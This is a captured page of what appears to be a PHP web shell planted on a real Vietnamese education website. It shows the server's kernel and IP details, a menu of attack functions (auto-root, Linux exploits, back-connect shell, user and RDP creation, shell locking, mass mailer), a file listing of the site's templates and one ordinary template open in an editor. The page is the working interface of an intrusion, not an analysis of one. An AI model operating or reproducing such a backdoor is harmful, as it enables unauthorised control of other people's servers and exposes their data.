Linux vps.sdns.vn 3.10.0-1160.99.1.el7.x86_64 #1 SMP Wed Sep 13 14:19:20 UTC 2023 x86_64
LiteSpeed
: 103.74.117.127 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.3.33
pcem
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
pcem /
domains /
pcem.edu.vn /
public_html /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
view_about.php
12.91
KB
-rw-r--r--
view_article _type.php
0
B
-rw-r--r--
view_article.php
18.81
KB
-rw-r--r--
view_brand.php
394
B
-rw-r--r--
view_call_btn.php
11.57
KB
-rw-r--r--
view_confirm.php
883
B
-rw-r--r--
view_contact.php
13.05
KB
-rw-r--r--
view_criteria.php
437
B
-rw-r--r--
view_customer.php
1.92
KB
-rw-r--r--
view_detail_about.php
2.56
KB
-rw-r--r--
view_detail_article.php
21.69
KB
-rw-r--r--
view_detail_document.php
1.85
KB
-rw-r--r--
view_detail_media.php
2.72
KB
-rw-r--r--
view_detail_product.php
3.27
KB
-rw-r--r--
view_document.php
2.58
KB
-rw-r--r--
view_footer.php
4.07
KB
-rw-r--r--
view_header.php
6.78
KB
-rw-r--r--
view_hits.php
871
B
-rw-r--r--
view_home.php
19.52
KB
-rw-r--r--
view_huongdan.php
699
B
-rw-r--r--
view_index.php
3.73
KB
-rw-r--r--
view_khachhangtaiphat.php
1.99
KB
-rw-r--r--
view_lang.php
2.04
KB
-rw-r--r--
view_login.php
9.89
KB
-rw-r--r--
view_media.php
3.26
KB
-rw-r--r--
view_media_type.php
0
B
-rw-r--r--
view_menu_left.php
212
B
-rw-r--r--
view_menu_top.php
1.93
KB
-rw-r--r--
view_menuhome.php
0
B
-rw-r--r--
view_order_detail.php
3.41
KB
-rw-r--r--
view_partner.php
963
B
-rw-r--r--
view_pay_cart.php
42.97
KB
-rw-r--r--
view_pay_cart_not_isset.php
335
B
-rw-r--r--
view_pay_cart_result.php
1.68
KB
-rw-r--r--
view_product.php
2
KB
-rw-r--r--
view_product_cat.php
2.08
KB
-rw-r--r--
view_product_cat3.php
1.99
KB
-rw-r--r--
view_product_cat4.php
1.99
KB
-rw-r--r--
view_product_new.php
1.99
KB
-rw-r--r--
view_register.php
6.61
KB
-rw-r--r--
view_search.php
18.67
KB
-rw-r--r--
view_shopping_cart.php
1.99
KB
-rw-r--r--
view_showroom.php
1.5
KB
-rw-r--r--
view_slideshow - Copy.php
1.38
KB
-rw-r--r--
view_slideshow.php
565
B
-rw-r--r--
view_support.php
1.54
KB
-rw-r--r--
view_thuvien.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_document.php
<div id="content" class="container"> <div class="Layout12vs363" id="main-content" role="main"> <div class="portlet-layout row-fluid row2"> <div class="portlet-boundary portlet-boundary_1_WAR_htmlportlet_ portlet-static portlet-static-end portlet-borderless html-portlet " id="p_p_id_1_WAR_htmlportlet_INSTANCE_2qFhStvFcUvV_"> <span id="p_1_WAR_htmlportlet_INSTANCE_2qFhStvFcUvV"></span> <div class="portlet-borderless-container" style=""> <div class="portlet-body"> <div class="image-gioithieu"> <p style="font-size: 24px; line-height: 3;"> <?php echo $mod_xu_ly_chung->breadcrumbs();?> </p> </div> </div> </div> </div> <div class="container" id="column-2"> <?php if(!isset($_SESSION['username'])) { ?> <h2 class="error_logo" > Bạn cần đăng nhập để xem tài liệu </h2> <?php require("views/view_login.php"); ?> <?php } else { ?> <h1 class="title_page" ><?php echo $title_name; ?></h1> <?php if($count >0 ){ ?> <div class="toplevel"> <ul> <?php foreach($catalog as $item){ ?> <li> <a title="" href="<?php echo BASE_URL.$item['uri_vi'].'-d'.$item['catid'].'.html' ?>"> <img width="50" src="<?php echo $site_url; ?>/uploads/iconmenu/thuVien.png" alt="<?php echo $item['catalog_name_vi'] ?>"> <span class="label_cat"><?php echo $item['catalog_name_vi'] ?></span> </a> </li> <?php } ?> </ul> </div> <?php } else { echo '<div class="toplevel"> <div class= " row document-wap">'; foreach($list_document as $item){ ?> <div class="document-item col-lg-6 col-md-6 col-sm-6" > <div class="item "> <div class=" col-left"> <a href="<?php echo BASE_URL.$item['uri_'.$lang_current].'-q'.$item['aid'].'.html';?>"> <img src="<?php echo BASE_URL.$item['image_name'];?>" alt="<?php echo $item['article_name_'.$lang_current];?>"> </a> </div> <div class="col-right"> <h3 class="title-doc"> <a href="<?php echo BASE_URL.$item['uri_'.$lang_current].'-q'.$item['aid'].'.html';?>"> <span class="news-title"> <?php echo $item['article_name_'.$lang_current];?></span> </a> </h3> </div> </div> </div> <?php } echo '</div> </div>'; }?> <?php } ?> </div> </div> </div> </div>
Close